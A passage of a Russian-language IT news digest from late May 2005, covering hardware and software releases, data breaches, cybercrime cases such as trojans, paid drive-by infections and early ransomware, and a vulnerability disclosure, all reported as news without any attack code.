Корпорация IBM представила программный продукт DB2 Anonymous Resolution, который позволяет организациям совместно использовать и сравнивать данные с соблюдением анонимности и без раскрытия секретных персональных сведений. В DB2 Anonymous Resolution используются необратимые «цифровые подписи» и технологии для сравнения данных в их «анонимной» форме. Решение повышает уровень конфиденциальности, исключая просмотр данных в исходном виде. Вместо установления связи между данными, а затем анонимизации результата, решение сначала анонимизирует данные, а затем устанавливает взаимосвзязи. Новое решение IBM Anonymous Resolution позволит заказчикам выполнить требования по безопасности и конфиденциальности при открытии доступа к своим информационным хранилищам. Например, в медицинской отрасли технология «анонимизации» может быть использована для освобождения медицинских данных от личной информации перед их совместным использованием и анализом в ходе исследований. Возможности этого ПО позволят, например, на основе одних только анонимизированных данных выявлять ситуации, когда два пациента являются одним и тем же человеком. DB2 Anonymous Resolution — продукт подразделения IBM Entity Analytic Solutions (созданного на основе разработки компании SRD, которую корпорация IBM приобрела в январе 2005 г.). Новое ПО, используя технологию Entity Resolution, анализирует данные и выявляет принадлежность информации во множестве разнородных наборов данных. Решение способно выявить совпадение идентификационных данных без обращения к первичным персональным идентификаторам (SSN, национальное удостоверение личности и т.д.) и при наличии неизбежных неточностей в анализируемых идентификационных данных (плохое качество данных, разночтения в именах, различные адреса, а также намеренные искажения, типичные для случаев мошенничества). ПО также способно выявлять неочевидные связи между отдельными идентификационными записями, например, общие телефонные номера, адреса или банковские счета. Это позволяет обнаруживать взаимосвязи и распознавать записи по принципу «кто знает кого». Продукт DB2 Anonymous Resolution уже поступил в продажу.
Источник

31/05/2005 10:30 Проблемы с совместимостью версий .Net Framework
Согласно докладу, опубликованному Microsoft, приложения, разработанные для программной платформы .Net Framework 1.1, некорректно ведут себя в новой ее версии, .Net Framework 2.0. Несмотря на это сроки выпуска инструментария Visual Studio 2005, который должен выйти во второй половине года, переносить не планируется. В ходе тестирования выяснилось, что около десятка изменений, внесенных в новые версии .Net Framework и Visual Studio, приводят к сбоям в работе старых приложений. Данные изменения были внесены из соображений обеспечения соответствия стандартам или исправления ошибок, а некоторые - по просьбе пользователей. В корпорации рассчитывают обеспечить нормальную работу приложений для .Net Framework 1.1 в новой версии среды во всех случаях кроме ряда задокументированных исключений.
"Открытые системы"

31/05/2005 09:31 AMD представит сдвоенные процессоры для настольных ПК
Во вторник на Тайване Advanced Micro Devices представит сдвоенные настольные чипы, а производители компьютеров — Hewlett-Packard, Acer и Lenovo Group — расскажут о том, как они намерены использовать их в своих семействах продуктов. На выставке Computex AMD продемонстрирует четыре процессора с двумя ядрами Athlon 64 X2 — 4800+, 4600+, 4400+ и 4200+. По словам менеджера по маркетингу продукта Athlon 64 Джонатана Секлера, 4200+ работает почти на 10% быстрее, чем Athlon 64 4000+, самый быстродействующий одинарный Athlon. Он утверждает также, что компьютер со сдвоенным процессором может превосходить по производительности системы с двумя обычными процессорами, хотя разница будет едва уловима. Зато такие машины будут дешевле и вдвое экономичнее. «В стойку можно упаковать больше компьютеров, — сказал Секлер. — Лицензии на ПО тоже часто будут стоить дешевле». Однако новые сдвоенные чипы продаются едва ли не по удвоенной цене. За модель 4800+ AMD просит $1001, а за 4600+ — $803 (при поставках партиями по 1000 штук) при том, что современные одноядерные модели 4400+ и 4200+ стоят соответственно $581 и $537. Конкурирующие процессоры Pentium D, которые Intel выпустила на прошлой неделе, продаются по цене от $241 до $530. Традиционно AMD продавала свои чипы дешевле, чем Intel, наращивая долю рынка. «Intel говорит, что она разминает свои маркетинговые мускулы, предлагая рынку дешевые продукты. Мы же ориентируемся на тех, кто ценит выигрыш в производительности», — заявил Секлер.
Источник

31/05/2005 09:02 Четыре израильские компании шпионили за конкурентами с помощью "троянов"
В Израиле предана огласке информация о задержаниях сотрудников нескольких известных коммерческих компаний, в том числе высокопоставленных, в связи с расследованием дела о серии случаев промышленного шпионажа с использованием "троянских" компьютерных программ. По сообщению израильской газеты Ha'aretz, всего было задержано 18 человек. Как было установлено, подозреваемые лица являлись причастными к установке на компьютерах конкурентов "шпионских" программных модулей, с помощью которых похищалась коммерческая информация, что стало причиной потери пострадавшими компаниями важных сделок и части клиентуры. Расследование велось в течение последних шести месяцев и продолжается до сих пор. Шпионская деятельность, по предположению следствия, велась не менее полутора лет. В числе задержанных - сотрудники провайдера спутникового телевидения YES, автомобильного реселлера Mayer Cars & Trucks и сотовых операторов Pelephone и Cellcom, а также 9 сотрудников частных детективных агентств. Примечательно, что одной из пострадавших сторон признал себя национальный оператор связи Bezeq, чьими подразделениями являются YES и Pelephone. Другими пострадавшими компаниями называются оператор кабельного телевидения HOT, сотовая компания Partner, а также ряд консалтинговых и рекламных агентств. Представители пострадавших фирм заявляют, что "шокированы" и "потрясены" обнародованной информацией и полагают, что конкурентная борьба не должна вестись подобными методами. Представители обвиняемых сторон заявляют, что также не приемлют подобных действий, придерживаются требований законодательства, и что в случае, если шпионаж действительно осуществлялся, это делалось вопреки корпоративным инструкциям. В компании YES подтвердили, что действительно работали с детективным агентствами, однако настаивали, чтобы и их работа оставалась в рамках закона.
Подробнее

30/05/2005 17:30 ФБР ищет взломщика HR-центра Стэндфорда
ФБР начало расследование взлома базы данных кадрового центра (Career Development Center) Стэндфордского университета, в результате которого была похищена конфиденциальная информация о 10 тысячах человек. Взлом сети извне произошел 11 мая, сказала генеральный советник университета Дебра Цумвольт (Debra Zumwalt). Администрация не знает, сколько номеров соцстрахования, резюме, финансовой и правительственной информации было похищено, поэтому предупредила об инциденте всех 9600 соискателей работы и 300 работодателей, зарегистрированных с 1996 года. Вскоре после обнаружения взлома сотрудники центра отключили сеть и сообщили в отделение ФБР города Сан-Хосе (штат Калифорния). По калифорнийскому «Акту о нарушении информационной безопасности» 2003 года (Security Breach Information Act) компании обязаны сообщать о фактах взлома, если могли быть похищены данные жителей штата. Аналогичный инцидент с академическим учреждением произошел в январе: хакеры получили доступ к данным о 30 тысячах студентов и преподавателей Университета Джорджа Мейсона (George Mason University) в штате Вирджиния.
Источник

30/05/2005 13:51 Китайских вебмастеров обязали зарегистрировать свои проекты
Выбор достаточно прост: либо проект проходит процедуру обязательной регистрации, либо его закрывают. Как сообщает агентство AFP, со ссылкой на местный портал Sohu.com, китайское министерство информации объясняет очередной акт закручивания гаек желанием положить конец деятельности многочисленных мошеннических сайтов и другим "нездоровым" проявлениям человеческой индивидуальности. Акция по добровольно-принудительной регистрации интернет-проектов началась в марте этого года и закончится 31 мая. А уже с первого июня незарегистрированным ресурсам начнут отказывать в услуге хостинга. Это касается всех веб-сайтов, "лежащих" на китайских серверах, начиная от домашних страничек и заканчивая солидными коммерческими ресурсами. Шансы уцелеть в данном случае имеют лишь сайты, находящиеся на иностранных хостинг-площадках, и зарегистрированные за пределами зоны ".cn".
Источник

30/05/2005 13:34 Обезврежен московский кардер
Правоохранительные органы России завершили предварнительное расследование уголовного дела в отношении жителя Москвы, который подозревается в совершении мошенничества с помощью карт экспресс-оплаты платежной интернет-системы Webmoney, сообщает РИА «Новости» со ссылкой на пресс-службу комитета. По информации пресс-службы МВД, в ходе расследования было установлено, что подозреваемый, имя которого не называется, «незаконно завладел» кодами активации предоплаченных карт этой системы и пытался пополнить с их помощью свой электронный платежный счет. «Своими действиями москвич, в отношении которого возбуждено дело, причинил ущерб в сумме свыше 200 тысяч рублей ООО «Гарантийное Агентство», которое эмитировало выпуск карт экспресс-оплаты», – отметили в пресс-службе. В ходе обыска, который был проведен дома у подозреваемого, сотрудники МВД обнаружили 87 листов формата А4 с распечатками похищенных кодов активации карт экспресс-оплаты. Они соответствовали картам номиналом в 50 и 100 принятых в системе условных единиц. Общая сумма составляла около 1,5 миллионов условных единиц, что по курсу системы (для валюты WMZ) соответствует 1,5 миллионам долларов. Каким именно образом он получил эти коды, устанавливаеться следствием.
Источник

30/05/2005 12:08 Internet Explorer 7 не будет запускаться на компьютерах с Windows 2000
Разработчики Internet Explorer объявили, что седьмая версия этого браузера не будет запускаться на компьютерах с операционной системой Windows 2000. Основные нововведения в Internet Explorer 7 будут связаны с безопасностью. Причем многие из защитных функций потребуют наличия на ПК программных модулей, входящих во второй сервис-пак для Windows ХР. Именно этим в Microsoft и объясняют отказ от выпуска новой модификации IE для Windows 2000. Прочие нововведения в Internet Explorer 7 будут включать в себя возможность работы в многооконном режиме (подобная функция уже давно имеется в альтернативных браузерах, в частности, Opera и Firefox), поддержку международных доменных имен (c нелатинскими символами) и полупрозрачной графики в формате PNG (Portable Network Graphics). Планируется, что бета-версия Internet Explorer 7 выйдет нынешним летом, а окончательная модификация браузера появится в конце 2005 - начале 2006 года. Одновременно стало известно о прекращении поддержки браузеров IE 5.01 SP3 и IE 6 SP1, использующихся вместе с операционной системой Windows 2000 с третьим пакетом обновлений. Для получения новых патчей пользователям вышеназванных браузеров необходимо инсталлировать четвертый сервис-пак для Windows 2000. Кстати, в ближайшее время софтверный гигант прекратит основную поддержку платформы Windows 2000, выпущенной в марте 2000 года. Расширенная поддержка этой операционной системы сохранится до 2010 года.
Подробнее

30/05/2005 11:25 Японские ученые создают сверхбыстрый суперкомпьютер.
Группа японских ученых приступает к созданию самого скоростного в мире суперкомпьютера. Планируемая скорость работы новинки, предназначенной для решения сложнейших научных задач, - 10 квадриллионов операций в секунду. Проект, как сообщает в понедельник японская печать, стартует в 2006 финансовом году и рассчитан на пять лет. Общий бюджет работ составляет свыше 100 млрд иен (около миллиарда долларов). В них задействуют лучшие научные кадры страны - ведущих специалистов Токийского университета, электротехнических компаний NEC и Hitachi. NEC уже имеет опыт создания подобных машин: компьютеры этой фирмы входит в тройку самых быстрых в мире.
Подробности

30/05/2005 10:53 ZombieMeter следит за взломанными ПК
Компания CipherTrust пытается вести учет взломанным ПК — непростое дело, когда ежедневно свыше 170 тыс. компьютеров превращаются в «зомби». В четверг компания CipherTrust запустила свой ZombieMeter, новую систему, которая отслеживает трафик от взломанных ПК во всем мире. ZombieMeter, доступный на веб-сайте CipherTrust, подсчитывает количество новых «зомби», появляющихся каждый час, и призван помочь в идентификации угроз безопасности в интернете, говорится в заявлении компании. Под зомби в данном контексте понимается компьютер — обычно подключенный к интернету через широкополосный канал и соединенный по бот-сети с другими такими же машинами — зараженный компьютерным червем или вирусом и использующийся дистанционно для организации DoS-атак и рассылки спама и подложных электронных писем. CipherTrust ежедневно фиксирует в среднем по 172 009 новых зомби. Около 26% из них находятся в странах Евросоюза, 20% — в США и 15% — в Китае. На прошлой неделе Федеральная торговая палата США призвала отрасль принять дополнительные меры против зомби-сетей, которые стали серьезной проблемой. Организация открыла сайт Operation Spam Zombie и планирует обратиться к интернет-сервис-провайдерам с просьбой изолировать зомби и помочь пользователям очистить свои ПК. Как сказано в заявлении главного технолога CipherTrust Пола Джаджа, компания обнаруживает угрозы, такие как деятельность зомби, коды вирусов и атаки фишеров, пользуясь данными своей программы IronMail, установленной у заказчиков.
Cайт проекта

30/05/2005 10:19 МВД намерено открыть новый интернет-портал
МВД России намерено в ближайшее время открыть новый интернет-портал, с помощью которого граждане смогут получать информацию о работе министерства и получать консультации. Как заявил в понедельник агентству "Интерфакс" начальник Управления общественных связей (УОС) МВД России Валерий Грибакин, "органы внутренних дел делают все возможное, чтобы стать более открытыми для общества. Для общения с гражданами мы намерены использовать и современные технологии - всемирную сеть". "Ежедневная практика показала, что спрос на такое тесное общение велик. Например, на официальном сайте министерства была открыта "общественная приемная". Ежедневно на сайт заходит около 3 тысяч пользователей, а в "приемную" поступало до 20 обращений", - отметил начальник управления. "Среди обращений были не только предложения об улучшении работы милиции, но и информация, полезная следствию, в том числе и жалобы", - подчеркнул Грибакин. Как известно, в настоящее время МВД России поддерживает сайт MVDInform.ru, где можно ознакомиться с новостями о деятельности правоохранительных органов и другой информацией о работе ведомства, а также задать вопросы и поучаствовать в форуме. Существуют версии сайта на английском и арабском языках. На обновленном портале, по сообщению "Интерфакса", "граждане смогут ознакомиться с новостями законодательства, некоторыми ведомственными правовыми актами, а также получить консультацию".
Источник

28/05/2005 14:38 Mail.Ru начинает работать по протоколу IMAP
26 мая почтовая служба Mail.Ru объявила о поддержке протокола IMAP (Internet Mail Access Protocol — протокол доступа к почте через интернет). IMAP — гораздо более современный и функциональный протокол для работы с электронной почтой при помощи почтовых клиентов (Outlook, The Bat и т.п.), чем использующийся сейчас во всех почтовых службах протокол POP3. Он имеет несколько весьма существенных преимуществ, призванных облегчить пользователю работу с почтой. Главный принцип работы IMAP — все содержимое почтового ящика пользователя, включая прочитанные ранее письма и отправленные сообщения, постоянно хранится на сервере и доступно для просмотра с любого компьютера через любую почтовую программу. Еще одна важная особенность протокола — при подключении к серверу через клиентскую программу (например, Outlook) на компьютер пользователя в первую очередь загружаются все заголовки новых писем, а текст каждого конкретного письма подгружается только после клика на его заголовок. Такое распределение нагрузки позволяет существенно экономить время и интернет-трафик и значительно облегчает работу с почтой на слабом канале. Пользователь имеет возможность вообще не загружать на свой компьютер ненужные ему в данный момент письма, большие приложения и тем более спам-сообщения. Кроме того, протокол IMAP в отличие от POP3, умеет работать с пользовательскими папками и при подключении к серверу передавать на локальный компьютер информацию об их названии и расположении писем в них.
Инструкция по настройке

28/05/2005 13:52 Эксплоит уязвимости стека TCP/IP
Опубликован исходный код эксплоита, позволяющего эксплуатировать уязвимость, обнаруженную в реализации timestamps (временные метки) в реализации стека TCP/IP многих ОС (см. http://www.kb.cert.org/vuls/id/637934). Автор - Daniel Hartmeier.
Эксплоит

28/05/2005 13:27 Итоги техногенной аварии для Рунета
Как известно, случившаяся 25 мая авария оставила многих москвичей без связи. Исследовательская J'son & Partners оценила убытки (и потенциальные прибыли) операторов мобильной связи и падение интернет-трафика. По подсчетам J'son & Partners, суммарное количество пользователей Интернета в России в день аварии снизилось на 20%, а число просмотренных страниц — на 40%. Как сообщают "Ведомости", мобильный трафик в южном направлении в день аварии вырос в 2-2,5 раза (можно сравнить с загрузкой сетей на Новый год). По оценке J'son & Partners, сотовые операторы могли дополнительно заработать до $11 миллионов. Правда, из-за лавинообразного роста трафика у многих абонентов возникли трудности с дозвоном.
Источник

28/05/2005 12:25 В России платят 6 центов за заражение
Поистине отвратительным можно назвать тот бизнес, который придумали «бизнесмены» из Нижнего Новгорода. Они предлагают веб-мастерам заражать посетителей своих сайтов и платят 6 центов за каждое заражение. Речь идет о сайте iframeDOLLARS.biz, зарегистрированном на имя Ника Федорова из Нижнего Новгорода. Там размещены условия так называемой «партнерской программы», по которой веб-мастерам предлагается установить на своих ресурсах вредоносный эксплоит, эксплуатирующий многочисленные уязвимости в Windows и Internet Explorer. Непропатченные компьютеры, на которых загружается этот сайт, получают весь спектр вредоносных программ: трояны, шпионское и рекламное ПО. При этом iframeDOLLARS платит веб-мастерам $61 за каждую 1000 инсталляций, то есть по шесть центов за одну зараженную систему. Фактически, злоумышленники переходят от подпольного движения и скрытного ведения дел к открытому бизнесу, нанимая к себе на работу независимых веб-мастеров. Они даже не стесняются указывать UIN для связи: 291994264. Это действительно неслыханно! Удивительно, что такой сайт как iframeDOLLARS до сих пор не закрыт и продолжает нормально функционировать в интернете, но это факт. Русская фирма рекламирует свой «продукт», который работает «без консоли ActiveX и без каких-либо всплывающих окон, это значит что вы не потеряете своих уникальных посетителей». Другими словами, посетители могут даже и не узнать, какой именно сайт их заразил. Какой-нибудь популярный ресурс размещает эксплоит на один день, «срубает бабки» и затем убирает его, чтобы замести следы. На самом деле, русские придумали отвратительный бизнес — здесь мы можем согласиться с зарубежными экспертами. По статистике вредоносного сайта, они уже выплатили своим партнерам $11 890, что соответствует почти 195 тыс. зараженных ПК: «С нами работает более 200 веб-мастеров», — хвастаются они.
Источник

28/05/2005 11:29 Производители ОС вяло реагируют на уязвимость
У производителей операционных систем было два месяца на то, что устранить уязвимость до того момента, когда о ней стало известно общественности. Однако многие с исправлением не поспешили. Колин Персиваль (Colin Percival) из команды специалистов по безопасности FreeBSD рассказал о подробностях уязвимости, которая распространяется на процессоры Intel, использующие технологию многопоточности HyperThreading, на конференции, что прошла 13 мая. Персиваль получил ответы от производителей операционных систем семейства *BSD, а также от SCO и Ubuntu Linux, однако многие отреагировали вяло — например, Red Hat, Novell, Mandriva и Microsoft. Учитывая, что я им сообщил о проблеме в начале марта, действительно думал, что они могли бы выпустить патч месяц назад, — прокомментировал Персиваль. — Я всем дал ясно понять, что представлю свое сообщение в тот день и им следует подготовиться к этому времени». Представитель из Red Hat, например, ответил, что команда по безопасности компании оценила проблему «умеренной» и работает с создателями OpenSSL (используемой для эксплуатирования уязвимости) над ее устранением. В Microsoft заявили, что, пока в компании проводилось исследование уведомления Персиваля, опасений атак с использованием данной уязвимости не возникало, и они будут дожидаться окончания экспертизы. В Novell ограничились следующим высказыванием: «Мы отдаем себе отчет по этой проблеме и работали над ее решением». В Intel опасность оценили как «очень низкую». Несмотря на то, что проблема распространяется только на многопользовательские серверы, такие машины широко используются, и для них «уязвимость весьма серьезна», считает Персиваль.
Nixp.Ru

28/05/2005 11:14 В России начинают выдавать биометрические загранпаспорта
Выдачу загранпаспортов с биометрическими параметрами в России планируют начать с Калининградской области, сообщил заместитель директора ФГУП НИИ «Восход» Станислав Михайлов. ФГУП НИИ «Восход» является разработчиком документов нового поколения. «Мы предлагаем создать так называемую „пилотную зону“, где можно будет испытать действия паспортов нового образца. Больше всего для этого подходит Калининградская область», — сказал г-н Михайлов. По его словам, Калининградская область — это особый регион, жители которого наиболее часто пользуются загранпаспортами. Г-н Михайлов также сообщил, что НИИ «Восход» разработал концепцию и план первоочередных мероприятий, согласованных с 14 органами федеральной власти, а также финансово-экономическое обоснование проекта перехода на паспорта с биометрическими параметрами. В паспорт предполагается включить пластиковую страницу, содержащую цифровое фото, считывающую строку и микросхему с биометрическими параметрами. «Цена одного такого паспорта пока не определена. Исходя из международного опыта, он будет стоить от 30 до 60 долларов США», — полагает Станислав Михайлов. Изготовлением новых паспортов займется Гознак Министерства финансов России, пишет «Газета».
Источник

28/05/2005 10:31 Microsoft раздаёт провайдерам антиспамерское оружие
В рамках портала MSN открылся новый ресурс Postmaster, предназначенный для борьбы со спамом, так или иначе связанным с сервисом Hotmail.com. Сервис предоставляет провайдерам и рядовым пользователям ряд инструментов для борьбы с мусорной рекламой в почтовых ящиках. В частности, задействован сервис Smart Network Data Services, предназначенный для информирования провайдеров о почтовых рассылках, осуществляющихся из их сетей на адреса @hotmail.com, с тем чтобы провайдеры могли быстро обнаруживать спамерские машины и нейтрализовывать их. С другой стороны, услуги предоставляются и тем, кто на легальной основе занимается рассылками электронной почты коммерческой направленности. Рассыльщикам за определённую плату в рамках программы Bonded Sender предоставляются приоритетные возможности по преодолению почтовых фильтров при условии, что эти рекламщики соблюдают-таки правила Hotmail.com.
Подробности

28/05/2005 10:07 AMD обнародовала детали плана виртуализации Pacifica
Компания Advanced Micro Devices опубликовала все детали технологии Pacifica, которая облегчит компьютерам исполнение нескольких операционных систем, — компьютерная индустрия с энтузиазмом относится к этой идее. Во многом напоминая конкурирующий продукт Intel, AMD Pacifica реализует технологию, называемую виртуализацией, в процессорах для серверов и настольных ПК. Чипы с технологией Pacifica выйдут в первом полугодии 2006 года. Виртуализация, разрывающая тесную связь между аппаратурой и программным обеспечением, наделяет системы гибкостью в отношении ПО, например, позволяя исполнять сразу несколько операционных систем. Это полезно для серверов, решающих несколько задач, и для настольных ПК, разделенных на отдельные сегменты для пользователей, технического персонала и администраторов. (Эту идею намерена реализовать молодая компания XenSource.) Публикацию некоторых деталей Pacifica компания AMD начала еще в марте, но PDF-документ с полной спецификацией появился только в среду. AMD опередила Intel с реализацией нескольких важных функций в процессорах х86, включая поддержку 64-разрядной адресации и встроенный контроллер памяти. Однако в части виртуализации Intel остается впереди: технология Intel Virtualization Technology (прежнее кодовое название Vanderpool) должна появиться уже в этом году в процессорах для настольных ПК и в чипах Itanium.
Спецификация Pacifica

27/05/2005 18:54 МВД России создает новый отдел по борьбе с хакерами - «Управление N»
По информации KM.ru, в МВД России решили нанимать на работу бывших системных администраторов либо бывших хакеров, чтобы противодействовать хакерам настоящим. Новый отдел называется «Управление N». В это управление принимают людей, имеющих определенные навыки и владеющих специальными знаниями.
Подробнее: KM.ru

27/05/2005 16:14 Обесточенная московская ВОС работала без сбоев
Московская телекоммуникационная корпорация «Комкор» объявляет о том, что в период энергетического кризиса все клиенты Московской волоконно-оптической сети обслуживались без сбоев, в том числе такие важные для городского жизнеобеспечения структуры, как ГУВД, мэрия Москвы и префектура столицы. Начальник Управления по работе с органами обеспечения безопасности города Москвы Николай Куликов одобрительно отозвался о работе каналов связи мэрии в этот сложный период. Представитель префектуры Юго-Восточного округа по информационным технологиям Татьяна Сысоева подтвердила тот факт, что связь в префектуре работала без перебоев. После отключения в нескольких округах столицы электропитания, сложности возникали и на узлах связи КОМКОРа. В 11:30 утра было отключено питание на 100 телекоммуникационных объектах связи МВОС. Более 800 абонентов, среди которых — большое число подразделений Правительства Москвы, ГУВД, ГО ЧС, скорой помощи и других городских служб оказались в аварийной зоне отключения каналов связи. Однако связь у абонентов «Комкора» не прерывалась. Оборудование «Комкор» автоматически переключилось на резервные схемы электропитания, что обеспечило его работоспособность.
CNews

27/05/2005 15:47 ЦРУ готовится к "цифровому Пёрл-Харбору"
ЦРУ, похоже, и впрямь всерьёз рассматривает возможность хакерской атаки, которая по своим последствиям может обернуться вторым "11 сентября". Как стало известно, в Центре информационных операций ЦРУ в Шарлоттсвилле (Вирджиния), в двух часах езды от Вашингтона, в течение трёх дней проводились своеобразные учения, призванные проверить устойчивость коммуникаций государственных структур к крупномасштабным хакерским атакам. Как пишет My Way News, по условиям учений предполагается, что в 2010 году неким несуществующим ныне альянсом антиамериканских и антиглобалистских организаций по США будет осуществлен могучий хакерский удар. В "учениях" участвовали около 75 человек, в основном, сотрудники ЦРУ, а также бывшие и нынешние чиновники американской администрации, которые имитировали борьбу с имитационными же кибератаками, наиболее мощные из которых должны были произойти под самый конец учений. Как отмечает My Way News, в США идея о возможности цифровых "11 сентября" или "Пёрл-Харбора" постепенно теряет сторонников. Всё большее число экспертов по терроризму утверждают, что значительно вероятнее атаки с использованием обычных видов вооружений или уж, во всяком случае, нецифровых коммуникаций. "Кибертерроризм уже давно не на первых позициях в списке угроз", - считает сотрудник Института технологий обеспечения безопасности Дартмутского колледжа Деннис Макграт, участвовавший в проведении аналогичных симуляций в своём институте.
"Компьюлента"

27/05/2005 15:34 Microsoft рекомендует пользователям IE деинсталлировать Netscape 8
Microsoft предупредила потребителей, что последняя версия браузера Netscape может нарушать работу механизма визуализации XML в Microsoft Internet Explorer. Дейв Масси, старший менеджер программы IE, в своем блоге указывает на то, что после установки Netscape 8 браузер IE, вместо XML-файлов, в том числе тех, в которых используется преобразование XSLT, будет отображать пустую страницу. Microsoft не уточнила, в каких именно версиях IE это проявляется, но на форуме DeveloperDex есть сообщение, что проблема возникала с IE 6 при установленном Windows Service Pack 2. В Microsoft сообщили, что компания изучает проблему и будет сотрудничать с Netscape для ее устранения. В качестве временного решения она рекомендует деинсталлировать Netscape 8 и отредактировать параметры системного реестра. Один из читателей блога высказал предположение, что виновником ошибки визуализации на самом деле может быть IE, а не Netscape. Он предполагает, что это играет на руку Microsoft, удерживая пользователей от мысли о переходе с IE на Netscape. Однако другой читатель, Крис Бич, вступился за Microsoft. «Измышление бесконечных теорий заговора по поводу Microsoft — грязная тактика. Какой только вздор не несут в ваш (Microsoft) адрес… парни, я всем сердцем с вами! Продолжайте спокойно работать над IE 7».
Блог Дейва Масси

27/05/2005 14:38 Первый массовый двухъядерный процессор Pentium D
Компания Intel представила свой первый массовый двухъядерный процессор Pentium D для использования в бытовых и офисных компьютерах. Продукт объединяет два вычислительных ядра на одном чипе, что обеспечивает повышенную производительность - как отмечают в компании, это будет полезно пользователям, которые привыкли работать с большим количеством одновременно запущенных в рамках операционной системы задач. Новый процессор является частью концепции Intel "digital home" ("цифровой дом"), в рамках которого компания объединяет различные компонентные технологии для создания бытовых электронных систем различного назначения. Как отмечает Associated Press, к концу года ведущий мировой производитель микропроцессоров намеревается продать несколько миллионов экземпляров Pentium D - к продаже в нынешнем квартале уже подготовлены 100 тысяч. Цена Pentium D, в зависимости от комплектации, составит от 241 до 530 долларов США, вычислительная мощность разных модификаций варьируется от 2,8 до 3,2 гигагерц. Это не первый двухядерный процессор Intel, накануне компания начала поставки мощного многоядерного процессора Pentium Extreme Edition, который, однако, нельзя назвать массовым, так как его розничная цена составляет около тысячи долларов, он предназначен для "компьютерных энтузиастов" и любителей ресурсоемких игр.
Источник

26/05/2005 14:10 США вновь требуют от России разобраться с пиратами
Фактически, Россию ставят перед выбором: либо призвать, наконец, к порядку распоясавшихся компьютерных и видеопиратов, либо отказаться от планов по вступлению во Всемирную торговую организацию. С таким заявлением выступил сенатор Оррин Хатч (Orrin Hatch), возглавляющий комитет по охране авторского права Сената США: "Прежде чем Россия вступит в ВТО, ей придется убедить многих из нас в том, что российское правительство действительно намерено положить конец [интеллектуальному пиратству]". Примерно такое же заявление, правда, выдержанное не в столь резком тоне, сделал и генеральный консультант аппарата Торгового представительства США Джеймс Менденхолл (James Mendenhall) в отношении Китая. Господин Менденхолл сообщил о намерении его коллег официально поднять вопрос о соблюдении международных соглашений о защите интеллектуальной собственности на ближайших переговорах, которые должны пройти на этой неделе в рамках ВТО.
Источник

26/05/2005 14:07 Хакеры шифруют файлы на чужих ПК и просят выкуп
У пользователей интернета появилась еще одна проблема, которая может ударить по кошельку. Теперь помимо шпионских программ, «троянов», вирусов и фишинга многим придется столкнуться с новым видом сетевого мошенничества, недавно зафиксированным в Сан-Диего (США). Эксперты уже окрестили хакерские наработки «выкуп-программой». Само мошенничество больше похоже на банальное вымогательство: разница лишь в том, что преступники в своей деятельности используют компьютерные технологии. Как рассказали специалисты по инфобезопасности одной из софтверных фирм в Сан-Диего, которые и раскрыли новый вид злодеяния, схема преступления проста. Хакер взламывает защиту компьютера, проникает в него и устанавливает пароли на важные для пользователя файлы. Через некоторое время жертва получает письмо с требованием заплатить энную сумму денег (в зафиксированном случае — порядка $200) за ключ к важному файлу. «Это все равно что к вам в дом пробрались бы посторонние, сменили на сейфовом замке комбинацию, а потом попросили бы денег за его открытие», — прокомментировал руководитель службы безопасности корпорации Symantec Оливер Френдрикс (Oliver Friedrichs). После изучения программного обеспечения, использовавшегося при атаке, программист корпорации Lurhq Джо Стюарт сумел самостоятельно открыть зашифрованные файлы. Таким образом, платить вымогателям не пришлось. Однако в ближайшем будущем, по словам г-на Стюарта, стоит ожидать более изощренных атак. Ведь не секрет, что со временем схемы мошенничества в интернете становятся более эффективными, поскольку хакеры учатся на своих ошибках и не допускают их впредь. Несмотря на удачный взлом зашифрованного файла, сейчас г-н Стюарт считает единственным реальным способом борьбы с подобным видом сетевой преступности поимку хакеров с поличным, то есть при получении выкупа. Представитель Symantec также пошутил, что скоро, вероятно, придется платить за «крышу», которая обеспечит сохранность файлов.
Источник

26/05/2005 13:54 Oracle сравнялась с IBM на рынке баз данных
В гонке за лидерство на рынке программного обеспечения баз данных Oracle в прошлом году шла «практически наравне» с IBM, утверждает аналитическая фирма Gartner. На долю Oracle приходится 34,1% всего рынка ПО реляционных баз данных, а на долю IBM — свыше 33,7%: в отчете этот результат называют «ничьей». По словам аналитиков Gartner, разница между двумя поставщиками в денежном выражении составила $30 млн. Третье место занимает Microsoft с 20% рынка. «Oracle продемонстрировала почти 15%-ый рост, большая часть которого происходит от ее достижений на платформе Linux», — говорится в заявлении старшего аналитика Gartner Колина Грэма. С другой стороны, большой вклад в рост IBM внесла ее СУБД DB2 на мейнфреймах zSeries и на платформе Unix, объем продаж которой вырос на 9%. Доходы от продаж новых лицензий всех компаний в 2004 году увеличились на $7,8 млрд — это на 10,3% больше, чем в 2003 ($7,1 млрд). Unix по-прежнему остается самой популярной платформой базы данных, но в 2004 году ее доля сократилась на 0,7%. На рынке ПО для Unix-серверов доминирует Oracle, которая продала примерно 56% всех новых лицензий. Объем продаж баз данных для Windows составил $3,1 млрд, увеличившись по сравнению с 2003 годом почти на 10%. На долю Microsoft приходится 51% этого сегмента. Титул самого динамично развивающегося сегмента рынка завоевали базы данных для Linux, продажи которых увеличились на целых 118%. В 2004 году в Linux-сегменте было продано новых лицензий примерно на $655 млн против $300 млн год назад. Его лидером этого является Oracle с 80,5%-ой долей рынка.
ZDNet

26/05/2005 13:49 ФБР начнет эксплуатацию антитеррористической системы в конце 2006 года
Глава ФБР Роберт Мюллер объявил ориентировочную дату запуска в эксплуатацию новой внутренней информационной системы, в рамках которой сотрудники спецслужб смогут обмениваться оперативными данными. Случится это не раньше, чем через полтора года, пишет агентство Reuters. Виной всему программная компонента Virtual Case File. Острая необходимость в современной автоматизированной антитеррористической системе возникла у ФБР после трагических событий 11 сентября 2001 года. На создание высокотехнологичной программы было выделено 170 миллионов долларов США. Но в феврале текущего года выяснилось, что денежные средства и время были потрачены впустую. Система Virtual Case File, которая должна была обеспечить агентам постоянный доступ к свежей информации и любым документам из общей базы данных ФБР, оказалась абсолютно неработоспособной. Это был вынужден признать Роберт Мюллер, после того как на его ведомство с критикой обрушилось министерство юстиции США. Поставила систему Virtual Сase File корпорация Science Applications International (SAIC), контракт с которой был заключен в июне 2001 года. Все это время программа находилась в режиме тестирования из-за множественных технических неполадок и недоработок. Специалисты SAIC попытались спасти положение и исправить ошибки, выявленные в ходе предварительных работ. Но их усилия завершились провалом - настройку и адаптацию Virtual Case File ФБР нашло нецелесообразным.
Источник

26/05/2005 13:23 Microsoft запрёт Office в силу «новых условий работы»
